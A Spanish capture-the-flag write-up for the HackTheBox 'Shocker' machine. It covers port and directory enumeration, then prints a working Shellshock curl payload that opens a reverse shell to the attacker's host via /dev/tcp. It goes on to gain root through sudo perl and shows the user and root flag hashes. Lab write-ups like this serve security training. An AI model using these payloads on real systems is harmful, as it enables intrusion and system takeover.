[HTB] Shocker

Hoy vamos a hackear la maquina de HTB llamada Shocker.
  • Video
  • Enumeration
  • Para empezar hacemos un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 10.10.10.56 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 23:41 CEST Nmap scan report for 10.10.10.56 Host is up (0.037s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 35.10 seconds
    Buscamos si hay algo interesante en Apache...
    sml@Cassandra:~$ gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirb/common.txt -x sh =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.56/cgi-bin [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: sh [+] Timeout: 10s =============================================================== 2020/05/09 23:42:24 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htaccess (Status: 403) /cgi-bin/ (Status: 403) /server-status (Status: 403) =============================================================== 2020/05/09 23:43:11 Finished ==============================================================
    Miramos dentro del directorio cgi-bin.
    sml@Cassandra:~$ gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirb/common.txt -x sh =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.56/cgi-bin [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: sh [+] Timeout: 10s =============================================================== 2020/05/09 23:44:24 Starting gobuster =============================================================== /.hta (Status: 403) /.hta.sh (Status: 403) /.htaccess (Status: 403) /.htaccess.sh (Status: 403) /.htpasswd (Status: 403) /.htpasswd.sh (Status: 403) /user.sh (Status: 200) =============================================================== 2020/05/09 23:45:01 Finished ==============================================================
    Vemos el fichero user.sh, y todo tiene pinta a que vamos a poder "abusar" de shellshock...
  • Exploitation
  • Ponemos a nc a la escucha:
    sml@Cassandra:~$ nc -nlvp 5555
    En otro terminal, usamos "shellshock" contra el fichero user.sh
    sml@Cassandra:~$ curl -H 'User-Agent: () { :; }; /bin/sh -i >& /dev/tcp/10.10.14.10/5555 0>&1' http://10.10.10.56/cgi-bin/user.sh
    Estamos dentro :)
    sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.56] 36732 /bin/sh: 0: can't access tty; job control turned off $
  • user.txt
  • Exploramos el sistema...
    $ id uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),1 16(sambashare) $ cd /home $ ls shelly $ cd shelly $ ls user.txt $ cat user.txt 2ec24e11320026d1e70ff3e16695b233
  • Privilege Escalation
  • Echamos un vistazo a sudo...
    $ sudo -l Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl
    Vemos que podemos ejecutar perl como "root", asi que ejecutamos una shell :)
    $ sudo perl -e 'exec "/bin/sh";' /bin/bash -i bash: no job control in this shell root@Shocker:/home/shelly#
  • root.txt
  • root@Shocker:/home/shelly# cd /root root@Shocker:~# ls root.txt root@Shocker:~# cat root.txt cat root.txt 52c2715605d70c7619030560dc1ca467
  • End
  • Y con esto ya tendriamos el flag del "user" y el flag de "root".